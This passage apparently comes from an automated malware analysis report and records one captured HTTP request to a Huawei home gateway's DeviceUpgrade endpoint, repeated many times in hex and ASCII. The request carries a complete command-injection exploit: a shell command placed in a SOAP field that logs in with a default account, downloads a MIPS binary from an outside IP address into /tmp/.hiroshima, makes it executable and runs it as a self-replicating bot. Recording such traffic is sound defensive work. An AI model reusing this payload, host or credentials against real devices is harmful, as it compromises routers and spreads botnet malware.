* /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
